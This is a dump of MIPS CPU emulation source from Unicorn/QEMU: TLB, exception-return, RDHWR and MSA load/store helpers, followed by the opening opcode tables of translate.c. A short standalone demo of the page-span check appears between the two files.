cpu_mips_tlb_flush(env); } r4k_mips_tlb_flush_extra(env, env->tlb->nb_tlb); if (tlb->EHINV) { env->CP0_EntryHi = 1 << CP0EnHi_EHINV; env->CP0_PageMask = 0; env->CP0_EntryLo0 = 0; env->CP0_EntryLo1 = 0; } else { env->CP0_EntryHi = mi ? 
tlb->VPN : tlb->VPN | tlb->ASID; env->CP0_MemoryMapID = tlb->MMID; env->CP0_PageMask = tlb->PageMask; env->CP0_EntryLo0 = tlb->G | (tlb->V0 << 1) | (tlb->D0 << 2) | ((uint64_t)tlb->RI0 << CP0EnLo_RI) | ((uint64_t)tlb->XI0 << CP0EnLo_XI) | (tlb->C0 << 3) | get_entrylo_pfn_from_tlb(tlb->PFN[0] >> 12); env->CP0_EntryLo1 = tlb->G | (tlb->V1 << 1) | (tlb->D1 << 2) | ((uint64_t)tlb->RI1 << CP0EnLo_RI) | ((uint64_t)tlb->XI1 << CP0EnLo_XI) | (tlb->C1 << 3) | get_entrylo_pfn_from_tlb(tlb->PFN[1] >> 12); } } void helper_tlbwi(CPUMIPSState *env) { env->tlb->helper_tlbwi(env); } void helper_tlbwr(CPUMIPSState *env) { env->tlb->helper_tlbwr(env); } void helper_tlbp(CPUMIPSState *env) { env->tlb->helper_tlbp(env); } void helper_tlbr(CPUMIPSState *env) { env->tlb->helper_tlbr(env); } void helper_tlbinv(CPUMIPSState *env) { env->tlb->helper_tlbinv(env); } void helper_tlbinvf(CPUMIPSState *env) { env->tlb->helper_tlbinvf(env); } #if 0 static void global_invalidate_tlb(CPUMIPSState *env, uint32_t invMsgVPN2, uint8_t invMsgR, uint32_t invMsgMMid, bool invAll, bool invVAMMid, bool invMMid, bool invVA) { int idx; r4k_tlb_t *tlb; bool VAMatch; bool MMidMatch; for (idx = 0; idx < env->tlb->nb_tlb; idx++) { tlb = &env->tlb->mmu.r4k.tlb[idx]; VAMatch = (((tlb->VPN & ~tlb->PageMask) == (invMsgVPN2 & ~tlb->PageMask)) #ifdef TARGET_MIPS64 && (extract64(env->CP0_EntryHi, 62, 2) == invMsgR) #endif ); MMidMatch = tlb->MMID == invMsgMMid; if ((invAll && (idx > env->CP0_Wired)) || (VAMatch && invVAMMid && (tlb->G || MMidMatch)) || (VAMatch && invVA) || (MMidMatch && !(tlb->G) && invMMid)) { tlb->EHINV = 1; } } cpu_mips_tlb_flush(env); } #endif void helper_ginvt(CPUMIPSState *env, target_ulong arg, uint32_t type) { #if 0 FIXME bool invAll = type == 0; bool invVA = type == 1; bool invMMid = type == 2; bool invVAMMid = type == 3; uint32_t invMsgVPN2 = arg & (TARGET_PAGE_MASK << 1); uint8_t invMsgR = 0; uint32_t invMsgMMid = env->CP0_MemoryMapID; CPUState *other_cs = first_cpu; #ifdef TARGET_MIPS64 invMsgR = extract64(arg, 62, 2); #endif CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); global_invalidate_tlb(&other_cpu->env, invMsgVPN2, invMsgR, invMsgMMid, invAll, invVAMMid, invMMid, invVA); } #endif } /* Specials */ target_ulong helper_di(CPUMIPSState *env) { target_ulong t0 = env->CP0_Status; env->CP0_Status = t0 & ~(1 << CP0St_IE); return t0; } target_ulong helper_ei(CPUMIPSState *env) { target_ulong t0 = env->CP0_Status; env->CP0_Status = t0 | (1 << CP0St_IE); return t0; } static void set_pc(CPUMIPSState *env, target_ulong error_pc) { env->active_tc.PC = error_pc & ~(target_ulong)1; if (error_pc & 1) { env->hflags |= MIPS_HFLAG_M16; } else { env->hflags &= ~(MIPS_HFLAG_M16); } } static inline void exception_return(CPUMIPSState *env) { if (env->CP0_Status & (1 << CP0St_ERL)) { set_pc(env, env->CP0_ErrorEPC); env->CP0_Status &= ~(1 << CP0St_ERL); } else { set_pc(env, env->CP0_EPC); env->CP0_Status &= ~(1 << CP0St_EXL); } compute_hflags(env); } void helper_eret(CPUMIPSState *env) { exception_return(env); env->CP0_LLAddr = 1; env->lladdr = 1; } void helper_eretnc(CPUMIPSState *env) { exception_return(env); } void helper_deret(CPUMIPSState *env) { env->hflags &= ~MIPS_HFLAG_DM; compute_hflags(env); set_pc(env, env->CP0_DEPC); } static inline void check_hwrena(CPUMIPSState *env, int reg, uintptr_t pc) { if ((env->hflags & MIPS_HFLAG_CP0) || (env->CP0_HWREna & (1 << reg))) { return; } do_raise_exception(env, EXCP_RI, pc); } target_ulong helper_rdhwr_cpunum(CPUMIPSState *env) { check_hwrena(env, 0, GETPC()); 
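/* RDHWR 0 (CPUNum): the CPU number lives in the low 10 bits of CP0.EBase. */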
return env->CP0_EBase & 0x3ff; } target_ulong helper_rdhwr_synci_step(CPUMIPSState *env) { check_hwrena(env, 1, GETPC()); return env->SYNCI_Step; } target_ulong helper_rdhwr_cc(CPUMIPSState *env) { check_hwrena(env, 2, GETPC()); // return (int32_t)cpu_mips_get_count(env); return 0; } target_ulong helper_rdhwr_ccres(CPUMIPSState *env) { check_hwrena(env, 3, GETPC()); return env->CCRes; } target_ulong helper_rdhwr_performance(CPUMIPSState *env) { check_hwrena(env, 4, GETPC()); return env->CP0_Performance0; } target_ulong helper_rdhwr_xnp(CPUMIPSState *env) { check_hwrena(env, 5, GETPC()); return (env->CP0_Config5 >> CP0C5_XNP) & 1; } void helper_pmon(CPUMIPSState *env, int function) { function /= 2; switch (function) { case 2: /* TODO: char inbyte(int waitflag); */ if (env->active_tc.gpr[4] == 0) { env->active_tc.gpr[2] = -1; } /* Fall through */ case 11: /* TODO: char inbyte (void); */ env->active_tc.gpr[2] = -1; break; case 3: case 12: printf("%c", (char)(env->active_tc.gpr[4] & 0xFF)); break; case 17: break; case 158: { unsigned char *fmt = (void *)(uintptr_t)env->active_tc.gpr[4]; printf("%s", fmt); } break; } } void helper_wait(CPUMIPSState *env) { CPUState *cs = env_cpu(env); cs->halted = 1; cpu_reset_interrupt(cs, CPU_INTERRUPT_WAKE); /* * Last instruction in the block, PC was updated before * - no need to recover PC and icount. */ raise_exception(env, EXCP_HLT); } void mips_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; int error_code = 0; int excp; if (!(env->hflags & MIPS_HFLAG_DM)) { env->CP0_BadVAddr = addr; } if (access_type == MMU_DATA_STORE) { excp = EXCP_AdES; } else { excp = EXCP_AdEL; if (access_type == MMU_INST_FETCH) { error_code |= EXCP_INST_NOTAVAIL; } } do_raise_exception_err(env, excp, error_code, retaddr); } void mips_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; if (access_type == MMU_INST_FETCH) { do_raise_exception(env, EXCP_IBE, retaddr); } else { do_raise_exception(env, EXCP_DBE, retaddr); } } /* MSA */ /* Data format min and max values */ #define DF_BITS(df) (1 << ((df) + 3)) /* Element-by-element access macros */ #define DF_ELEMENTS(df) (MSA_WRLEN / DF_BITS(df)) #define MEMOP_IDX(DF) \ TCGMemOpIdx oi = make_memop_idx(MO_TE | DF | MO_UNALN, \ cpu_mmu_index(env, false)); void helper_msa_ld_b(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); MEMOP_IDX(DF_BYTE) #if !defined(HOST_WORDS_BIGENDIAN) pwd->b[0] = helper_ret_ldub_mmu(env, addr + (0 << DF_BYTE), oi, GETPC()); pwd->b[1] = helper_ret_ldub_mmu(env, addr + (1 << DF_BYTE), oi, GETPC()); pwd->b[2] = helper_ret_ldub_mmu(env, addr + (2 << DF_BYTE), oi, GETPC()); pwd->b[3] = helper_ret_ldub_mmu(env, addr + (3 << DF_BYTE), oi, GETPC()); pwd->b[4] = helper_ret_ldub_mmu(env, addr + (4 << DF_BYTE), oi, GETPC()); pwd->b[5] = helper_ret_ldub_mmu(env, addr + (5 << DF_BYTE), oi, GETPC()); pwd->b[6] = helper_ret_ldub_mmu(env, addr + (6 << DF_BYTE), oi, GETPC()); pwd->b[7] = helper_ret_ldub_mmu(env, addr + (7 << DF_BYTE), oi, GETPC()); pwd->b[8] = helper_ret_ldub_mmu(env, addr + (8 << DF_BYTE), oi, GETPC()); pwd->b[9] = helper_ret_ldub_mmu(env, addr + (9 << DF_BYTE), oi, GETPC()); pwd->b[10] = helper_ret_ldub_mmu(env, addr + (10 << DF_BYTE), oi, GETPC()); 
pwd->b[11] = helper_ret_ldub_mmu(env, addr + (11 << DF_BYTE), oi, GETPC()); pwd->b[12] = helper_ret_ldub_mmu(env, addr + (12 << DF_BYTE), oi, GETPC()); pwd->b[13] = helper_ret_ldub_mmu(env, addr + (13 << DF_BYTE), oi, GETPC()); pwd->b[14] = helper_ret_ldub_mmu(env, addr + (14 << DF_BYTE), oi, GETPC()); pwd->b[15] = helper_ret_ldub_mmu(env, addr + (15 << DF_BYTE), oi, GETPC()); #else pwd->b[0] = helper_ret_ldub_mmu(env, addr + (7 << DF_BYTE), oi, GETPC()); pwd->b[1] = helper_ret_ldub_mmu(env, addr + (6 << DF_BYTE), oi, GETPC()); pwd->b[2] = helper_ret_ldub_mmu(env, addr + (5 << DF_BYTE), oi, GETPC()); pwd->b[3] = helper_ret_ldub_mmu(env, addr + (4 << DF_BYTE), oi, GETPC()); pwd->b[4] = helper_ret_ldub_mmu(env, addr + (3 << DF_BYTE), oi, GETPC()); pwd->b[5] = helper_ret_ldub_mmu(env, addr + (2 << DF_BYTE), oi, GETPC()); pwd->b[6] = helper_ret_ldub_mmu(env, addr + (1 << DF_BYTE), oi, GETPC()); pwd->b[7] = helper_ret_ldub_mmu(env, addr + (0 << DF_BYTE), oi, GETPC()); pwd->b[8] = helper_ret_ldub_mmu(env, addr + (15 << DF_BYTE), oi, GETPC()); pwd->b[9] = helper_ret_ldub_mmu(env, addr + (14 << DF_BYTE), oi, GETPC()); pwd->b[10] = helper_ret_ldub_mmu(env, addr + (13 << DF_BYTE), oi, GETPC()); pwd->b[11] = helper_ret_ldub_mmu(env, addr + (12 << DF_BYTE), oi, GETPC()); pwd->b[12] = helper_ret_ldub_mmu(env, addr + (11 << DF_BYTE), oi, GETPC()); pwd->b[13] = helper_ret_ldub_mmu(env, addr + (10 << DF_BYTE), oi, GETPC()); pwd->b[14] = helper_ret_ldub_mmu(env, addr + (9 << DF_BYTE), oi, GETPC()); pwd->b[15] = helper_ret_ldub_mmu(env, addr + (8 << DF_BYTE), oi, GETPC()); #endif } void helper_msa_ld_h(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); MEMOP_IDX(DF_HALF) #if !defined(HOST_WORDS_BIGENDIAN) pwd->h[0] = helper_ret_lduw_mmu(env, addr + (0 << DF_HALF), oi, GETPC()); pwd->h[1] = helper_ret_lduw_mmu(env, addr + (1 << DF_HALF), oi, GETPC()); pwd->h[2] = helper_ret_lduw_mmu(env, addr + (2 << DF_HALF), oi, GETPC()); pwd->h[3] = helper_ret_lduw_mmu(env, addr + (3 << DF_HALF), oi, GETPC()); pwd->h[4] = helper_ret_lduw_mmu(env, addr + (4 << DF_HALF), oi, GETPC()); pwd->h[5] = helper_ret_lduw_mmu(env, addr + (5 << DF_HALF), oi, GETPC()); pwd->h[6] = helper_ret_lduw_mmu(env, addr + (6 << DF_HALF), oi, GETPC()); pwd->h[7] = helper_ret_lduw_mmu(env, addr + (7 << DF_HALF), oi, GETPC()); #else pwd->h[0] = helper_ret_lduw_mmu(env, addr + (3 << DF_HALF), oi, GETPC()); pwd->h[1] = helper_ret_lduw_mmu(env, addr + (2 << DF_HALF), oi, GETPC()); pwd->h[2] = helper_ret_lduw_mmu(env, addr + (1 << DF_HALF), oi, GETPC()); pwd->h[3] = helper_ret_lduw_mmu(env, addr + (0 << DF_HALF), oi, GETPC()); pwd->h[4] = helper_ret_lduw_mmu(env, addr + (7 << DF_HALF), oi, GETPC()); pwd->h[5] = helper_ret_lduw_mmu(env, addr + (6 << DF_HALF), oi, GETPC()); pwd->h[6] = helper_ret_lduw_mmu(env, addr + (5 << DF_HALF), oi, GETPC()); pwd->h[7] = helper_ret_lduw_mmu(env, addr + (4 << DF_HALF), oi, GETPC()); #endif } void helper_msa_ld_w(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); MEMOP_IDX(DF_WORD) #if !defined(HOST_WORDS_BIGENDIAN) pwd->w[0] = helper_ret_ldul_mmu(env, addr + (0 << DF_WORD), oi, GETPC()); pwd->w[1] = helper_ret_ldul_mmu(env, addr + (1 << DF_WORD), oi, GETPC()); pwd->w[2] = helper_ret_ldul_mmu(env, addr + (2 << DF_WORD), oi, GETPC()); pwd->w[3] = helper_ret_ldul_mmu(env, addr + (3 << DF_WORD), oi, GETPC()); #else pwd->w[0] = helper_ret_ldul_mmu(env, addr + (1 << DF_WORD), oi, GETPC()); pwd->w[1] = helper_ret_ldul_mmu(env, addr + (0 
<< DF_WORD), oi, GETPC()); pwd->w[2] = helper_ret_ldul_mmu(env, addr + (3 << DF_WORD), oi, GETPC()); pwd->w[3] = helper_ret_ldul_mmu(env, addr + (2 << DF_WORD), oi, GETPC()); #endif } void helper_msa_ld_d(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); MEMOP_IDX(DF_DOUBLE) pwd->d[0] = helper_ret_ldq_mmu(env, addr + (0 << DF_DOUBLE), oi, GETPC()); pwd->d[1] = helper_ret_ldq_mmu(env, addr + (1 << DF_DOUBLE), oi, GETPC()); } #define MSA_PAGESPAN(x) \ ((((x) & ~TARGET_PAGE_MASK) + MSA_WRLEN / 8 - 1) >= TARGET_PAGE_SIZE) static inline void ensure_writable_pages(CPUMIPSState *env, target_ulong addr, int mmu_idx, uintptr_t retaddr) { /* FIXME: Probe the actual accesses (pass and use a size) */ if (unlikely(MSA_PAGESPAN(addr))) { /* first page */ probe_write(env, addr, 0, mmu_idx, retaddr); /* second page */ addr = (addr & TARGET_PAGE_MASK) + TARGET_PAGE_SIZE; probe_write(env, addr, 0, mmu_idx, retaddr); } } void helper_msa_st_b(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); int mmu_idx = cpu_mmu_index(env, false); MEMOP_IDX(DF_BYTE) ensure_writable_pages(env, addr, mmu_idx, GETPC()); #if !defined(HOST_WORDS_BIGENDIAN) helper_ret_stb_mmu(env, addr + (0 << DF_BYTE), pwd->b[0], oi, GETPC()); helper_ret_stb_mmu(env, addr + (1 << DF_BYTE), pwd->b[1], oi, GETPC()); helper_ret_stb_mmu(env, addr + (2 << DF_BYTE), pwd->b[2], oi, GETPC()); helper_ret_stb_mmu(env, addr + (3 << DF_BYTE), pwd->b[3], oi, GETPC()); helper_ret_stb_mmu(env, addr + (4 << DF_BYTE), pwd->b[4], oi, GETPC()); helper_ret_stb_mmu(env, addr + (5 << DF_BYTE), pwd->b[5], oi, GETPC()); helper_ret_stb_mmu(env, addr + (6 << DF_BYTE), pwd->b[6], oi, GETPC()); helper_ret_stb_mmu(env, addr + (7 << DF_BYTE), pwd->b[7], oi, GETPC()); helper_ret_stb_mmu(env, addr + (8 << DF_BYTE), pwd->b[8], oi, GETPC()); helper_ret_stb_mmu(env, addr + (9 << DF_BYTE), pwd->b[9], oi, GETPC()); helper_ret_stb_mmu(env, addr + (10 << DF_BYTE), pwd->b[10], oi, GETPC()); helper_ret_stb_mmu(env, addr + (11 << DF_BYTE), pwd->b[11], oi, GETPC()); helper_ret_stb_mmu(env, addr + (12 << DF_BYTE), pwd->b[12], oi, GETPC()); helper_ret_stb_mmu(env, addr + (13 << DF_BYTE), pwd->b[13], oi, GETPC()); helper_ret_stb_mmu(env, addr + (14 << DF_BYTE), pwd->b[14], oi, GETPC()); helper_ret_stb_mmu(env, addr + (15 << DF_BYTE), pwd->b[15], oi, GETPC()); #else helper_ret_stb_mmu(env, addr + (7 << DF_BYTE), pwd->b[0], oi, GETPC()); helper_ret_stb_mmu(env, addr + (6 << DF_BYTE), pwd->b[1], oi, GETPC()); helper_ret_stb_mmu(env, addr + (5 << DF_BYTE), pwd->b[2], oi, GETPC()); helper_ret_stb_mmu(env, addr + (4 << DF_BYTE), pwd->b[3], oi, GETPC()); helper_ret_stb_mmu(env, addr + (3 << DF_BYTE), pwd->b[4], oi, GETPC()); helper_ret_stb_mmu(env, addr + (2 << DF_BYTE), pwd->b[5], oi, GETPC()); helper_ret_stb_mmu(env, addr + (1 << DF_BYTE), pwd->b[6], oi, GETPC()); helper_ret_stb_mmu(env, addr + (0 << DF_BYTE), pwd->b[7], oi, GETPC()); helper_ret_stb_mmu(env, addr + (15 << DF_BYTE), pwd->b[8], oi, GETPC()); helper_ret_stb_mmu(env, addr + (14 << DF_BYTE), pwd->b[9], oi, GETPC()); helper_ret_stb_mmu(env, addr + (13 << DF_BYTE), pwd->b[10], oi, GETPC()); helper_ret_stb_mmu(env, addr + (12 << DF_BYTE), pwd->b[11], oi, GETPC()); helper_ret_stb_mmu(env, addr + (11 << DF_BYTE), pwd->b[12], oi, GETPC()); helper_ret_stb_mmu(env, addr + (10 << DF_BYTE), pwd->b[13], oi, GETPC()); helper_ret_stb_mmu(env, addr + (9 << DF_BYTE), pwd->b[14], oi, GETPC()); helper_ret_stb_mmu(env, addr + (8 << DF_BYTE), pwd->b[15], oi, 
GETPC()); #endif } void helper_msa_st_h(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); int mmu_idx = cpu_mmu_index(env, false); MEMOP_IDX(DF_HALF) ensure_writable_pages(env, addr, mmu_idx, GETPC()); #if !defined(HOST_WORDS_BIGENDIAN) helper_ret_stw_mmu(env, addr + (0 << DF_HALF), pwd->h[0], oi, GETPC()); helper_ret_stw_mmu(env, addr + (1 << DF_HALF), pwd->h[1], oi, GETPC()); helper_ret_stw_mmu(env, addr + (2 << DF_HALF), pwd->h[2], oi, GETPC()); helper_ret_stw_mmu(env, addr + (3 << DF_HALF), pwd->h[3], oi, GETPC()); helper_ret_stw_mmu(env, addr + (4 << DF_HALF), pwd->h[4], oi, GETPC()); helper_ret_stw_mmu(env, addr + (5 << DF_HALF), pwd->h[5], oi, GETPC()); helper_ret_stw_mmu(env, addr + (6 << DF_HALF), pwd->h[6], oi, GETPC()); helper_ret_stw_mmu(env, addr + (7 << DF_HALF), pwd->h[7], oi, GETPC()); #else helper_ret_stw_mmu(env, addr + (3 << DF_HALF), pwd->h[0], oi, GETPC()); helper_ret_stw_mmu(env, addr + (2 << DF_HALF), pwd->h[1], oi, GETPC()); helper_ret_stw_mmu(env, addr + (1 << DF_HALF), pwd->h[2], oi, GETPC()); helper_ret_stw_mmu(env, addr + (0 << DF_HALF), pwd->h[3], oi, GETPC()); helper_ret_stw_mmu(env, addr + (7 << DF_HALF), pwd->h[4], oi, GETPC()); helper_ret_stw_mmu(env, addr + (6 << DF_HALF), pwd->h[5], oi, GETPC()); helper_ret_stw_mmu(env, addr + (5 << DF_HALF), pwd->h[6], oi, GETPC()); helper_ret_stw_mmu(env, addr + (4 << DF_HALF), pwd->h[7], oi, GETPC()); #endif } void helper_msa_st_w(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); int mmu_idx = cpu_mmu_index(env, false); MEMOP_IDX(DF_WORD) ensure_writable_pages(env, addr, mmu_idx, GETPC()); #if !defined(HOST_WORDS_BIGENDIAN) helper_ret_stl_mmu(env, addr + (0 << DF_WORD), pwd->w[0], oi, GETPC()); helper_ret_stl_mmu(env, addr + (1 << DF_WORD), pwd->w[1], oi, GETPC()); helper_ret_stl_mmu(env, addr + (2 << DF_WORD), pwd->w[2], oi, GETPC()); helper_ret_stl_mmu(env, addr + (3 << DF_WORD), pwd->w[3], oi, GETPC()); #else helper_ret_stl_mmu(env, addr + (1 << DF_WORD), pwd->w[0], oi, GETPC()); helper_ret_stl_mmu(env, addr + (0 << DF_WORD), pwd->w[1], oi, GETPC()); helper_ret_stl_mmu(env, addr + (3 << DF_WORD), pwd->w[2], oi, GETPC()); helper_ret_stl_mmu(env, addr + (2 << DF_WORD), pwd->w[3], oi, GETPC()); #endif } void helper_msa_st_d(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); int mmu_idx = cpu_mmu_index(env, false); MEMOP_IDX(DF_DOUBLE) ensure_writable_pages(env, addr, mmu_idx, GETPC()); helper_ret_stq_mmu(env, addr + (0 << DF_DOUBLE), pwd->d[0], oi, GETPC()); helper_ret_stq_mmu(env, addr + (1 << DF_DOUBLE), pwd->d[1], oi, GETPC()); } void helper_cache(CPUMIPSState *env, target_ulong addr, uint32_t op) { target_ulong index = addr & 0x1fffffff; if (op == 9) { /* Index Store Tag */ memory_region_dispatch_write(env->uc, env->itc_tag, index, env->CP0_TagLo, MO_64, MEMTXATTRS_UNSPECIFIED); } else if (op == 5) { /* Index Load Tag */ memory_region_dispatch_read(env->uc, env->itc_tag, index, &env->CP0_TagLo, MO_64, MEMTXATTRS_UNSPECIFIED); } } 
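The ensure_writable_pages() probe used by the MSA store helpers above only touches both pages when MSA_PAGESPAN() reports that the 16-byte vector access crosses a page boundary; either both stores are then allowed, or the access faults before any memory is modified. A minimal standalone rendering of that predicate, assuming 4 KiB pages and a 128-bit vector; every DEMO_* name and the driver main() are illustrative, not part of QEMU or Unicorn:

#include <stdint.h>
#include <stdio.h>

/* Illustrative stand-ins for TARGET_PAGE_SIZE/TARGET_PAGE_MASK (4 KiB pages
 * assumed) and for MSA_WRLEN / 8 (a 128-bit MSA vector register). */
#define DEMO_PAGE_SIZE 4096u
#define DEMO_PAGE_MASK (~(DEMO_PAGE_SIZE - 1))
#define DEMO_MSA_BYTES 16u

/* Same shape as MSA_PAGESPAN(): does a vector access at x spill into the
 * following page? */
#define DEMO_PAGESPAN(x) \
    ((((x) & ~DEMO_PAGE_MASK) + DEMO_MSA_BYTES - 1) >= DEMO_PAGE_SIZE)

int main(void)
{
    printf("%d\n", DEMO_PAGESPAN(0x1000u)); /* 0: whole vector in one page */
    printf("%d\n", DEMO_PAGESPAN(0x1FF8u)); /* 1: bytes 8..15 land in the next page */
    return 0;
}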
unicorn-2.1.1/qemu/target/mips/translate.c
/* * MIPS emulation for QEMU - main translation routines * * Copyright (c) 2004-2005 Jocelyn Mayer * Copyright (c) 2006 Marius Groeger (FPU operations) * Copyright (c) 2006 Thiemo Seufer (MIPS32R2 support) * Copyright (c) 2009 CodeSourcery (MIPS16 and microMIPS support) * Copyright (c) 2012 Jia Liu & Dongxue Zhang (MIPS ASE DSP support) * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "hw/mips/cpudevs.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "exec/translator.h" #define MIPS_DEBUG_DISAS 0 /* MIPS major opcodes */ #define MASK_OP_MAJOR(op) (op & (0x3FUL << 26)) enum { /* indirect opcode tables */ OPC_SPECIAL = (0x00 << 26), OPC_REGIMM = (0x01 << 26), OPC_CP0 = (0x10 << 26), OPC_CP1 = (0x11 << 26), OPC_CP2 = (0x12 << 26), OPC_CP3 = (0x13 << 26), OPC_SPECIAL2 = (0x1C << 26), OPC_SPECIAL3 = (0x1F << 26), /* arithmetic with immediate */ OPC_ADDI = (0x08 << 26), OPC_ADDIU = (0x09 << 26), OPC_SLTI = (0x0A << 26), OPC_SLTIU = (0x0B << 26), /* logic with immediate */ OPC_ANDI = (0x0C << 26), OPC_ORI = (0x0D << 26), OPC_XORI = (0x0E << 26), OPC_LUI = (0x0F << 26), /* arithmetic with immediate */ OPC_DADDI = (0x18 << 26), OPC_DADDIU = (0x19 << 26), /* Jump and branches */ OPC_J = (0x02 << 26), OPC_JAL = (0x03 << 26), OPC_BEQ = (0x04 << 26), /* Unconditional if rs = rt = 0 (B) */ OPC_BEQL = (0x14 << 26), OPC_BNE = (0x05 << 26), OPC_BNEL = (0x15 << 26), OPC_BLEZ = (0x06 << 26), OPC_BLEZL = (0x16 << 26), OPC_BGTZ = (0x07 << 26), OPC_BGTZL = (0x17 << 26), OPC_JALX = (0x1D << 26), OPC_DAUI = (0x1D << 26), /* Load and stores */ OPC_LDL = (0x1A << 26), OPC_LDR = (0x1B << 26), OPC_LB = (0x20 << 26), OPC_LH = (0x21 << 26), OPC_LWL = (0x22 << 26), OPC_LW = (0x23 << 26), OPC_LWPC = OPC_LW | 0x5, OPC_LBU = (0x24 << 26), OPC_LHU = (0x25 << 26), OPC_LWR = (0x26 << 26), OPC_LWU = (0x27 << 26), OPC_SB = (0x28 << 26), OPC_SH = (0x29 << 26), OPC_SWL = (0x2A << 26), OPC_SW = (0x2B << 26), OPC_SDL = (0x2C << 26), OPC_SDR = (0x2D << 26), OPC_SWR = (0x2E << 26), OPC_LL = (0x30 << 26), OPC_LLD = (0x34 << 26), OPC_LD =
(0x37 << 26), OPC_LDPC = OPC_LD | 0x5, OPC_SC = (0x38 << 26), OPC_SCD = (0x3C << 26), OPC_SD = (0x3F << 26), /* Floating point load/store */ OPC_LWC1 = (0x31 << 26), OPC_LWC2 = (0x32 << 26), OPC_LDC1 = (0x35 << 26), OPC_LDC2 = (0x36 << 26), OPC_SWC1 = (0x39 << 26), OPC_SWC2 = (0x3A << 26), OPC_SDC1 = (0x3D << 26), OPC_SDC2 = (0x3E << 26), /* Compact Branches */ OPC_BLEZALC = (0x06 << 26), OPC_BGEZALC = (0x06 << 26), OPC_BGEUC = (0x06 << 26), OPC_BGTZALC = (0x07 << 26), OPC_BLTZALC = (0x07 << 26), OPC_BLTUC = (0x07 << 26), OPC_BOVC = (0x08 << 26), OPC_BEQZALC = (0x08 << 26), OPC_BEQC = (0x08 << 26), OPC_BLEZC = (0x16 << 26), OPC_BGEZC = (0x16 << 26), OPC_BGEC = (0x16 << 26), OPC_BGTZC = (0x17 << 26), OPC_BLTZC = (0x17 << 26), OPC_BLTC = (0x17 << 26), OPC_BNVC = (0x18 << 26), OPC_BNEZALC = (0x18 << 26), OPC_BNEC = (0x18 << 26), OPC_BC = (0x32 << 26), OPC_BEQZC = (0x36 << 26), OPC_JIC = (0x36 << 26), OPC_BALC = (0x3A << 26), OPC_BNEZC = (0x3E << 26), OPC_JIALC = (0x3E << 26), /* MDMX ASE specific */ OPC_MDMX = (0x1E << 26), /* MSA ASE, same as MDMX */ OPC_MSA = OPC_MDMX, /* Cache and prefetch */ OPC_CACHE = (0x2F << 26), OPC_PREF = (0x33 << 26), /* PC-relative address computation / loads */ OPC_PCREL = (0x3B << 26), }; /* PC-relative address computation / loads */ #define MASK_OPC_PCREL_TOP2BITS(op) (MASK_OP_MAJOR(op) | (op & (3 << 19))) #define MASK_OPC_PCREL_TOP5BITS(op) (MASK_OP_MAJOR(op) | (op & (0x1f << 16))) enum { /* Instructions determined by bits 19 and 20 */ OPC_ADDIUPC = OPC_PCREL | (0 << 19), R6_OPC_LWPC = OPC_PCREL | (1 << 19), OPC_LWUPC = OPC_PCREL | (2 << 19), /* Instructions determined by bits 16 ... 20 */ OPC_AUIPC = OPC_PCREL | (0x1e << 16), OPC_ALUIPC = OPC_PCREL | (0x1f << 16), /* Other */ R6_OPC_LDPC = OPC_PCREL | (6 << 18), }; /* MIPS special opcodes */ #define MASK_SPECIAL(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { /* Shifts */ OPC_SLL = 0x00 | OPC_SPECIAL, /* NOP is SLL r0, r0, 0 */ /* SSNOP is SLL r0, r0, 1 */ /* EHB is SLL r0, r0, 3 */ OPC_SRL = 0x02 | OPC_SPECIAL, /* also ROTR */ OPC_ROTR = OPC_SRL | (1 << 21), OPC_SRA = 0x03 | OPC_SPECIAL, OPC_SLLV = 0x04 | OPC_SPECIAL, OPC_SRLV = 0x06 | OPC_SPECIAL, /* also ROTRV */ OPC_ROTRV = OPC_SRLV | (1 << 6), OPC_SRAV = 0x07 | OPC_SPECIAL, OPC_DSLLV = 0x14 | OPC_SPECIAL, OPC_DSRLV = 0x16 | OPC_SPECIAL, /* also DROTRV */ OPC_DROTRV = OPC_DSRLV | (1 << 6), OPC_DSRAV = 0x17 | OPC_SPECIAL, OPC_DSLL = 0x38 | OPC_SPECIAL, OPC_DSRL = 0x3A | OPC_SPECIAL, /* also DROTR */ OPC_DROTR = OPC_DSRL | (1 << 21), OPC_DSRA = 0x3B | OPC_SPECIAL, OPC_DSLL32 = 0x3C | OPC_SPECIAL, OPC_DSRL32 = 0x3E | OPC_SPECIAL, /* also DROTR32 */ OPC_DROTR32 = OPC_DSRL32 | (1 << 21), OPC_DSRA32 = 0x3F | OPC_SPECIAL, /* Multiplication / division */ OPC_MULT = 0x18 | OPC_SPECIAL, OPC_MULTU = 0x19 | OPC_SPECIAL, OPC_DIV = 0x1A | OPC_SPECIAL, OPC_DIVU = 0x1B | OPC_SPECIAL, OPC_DMULT = 0x1C | OPC_SPECIAL, 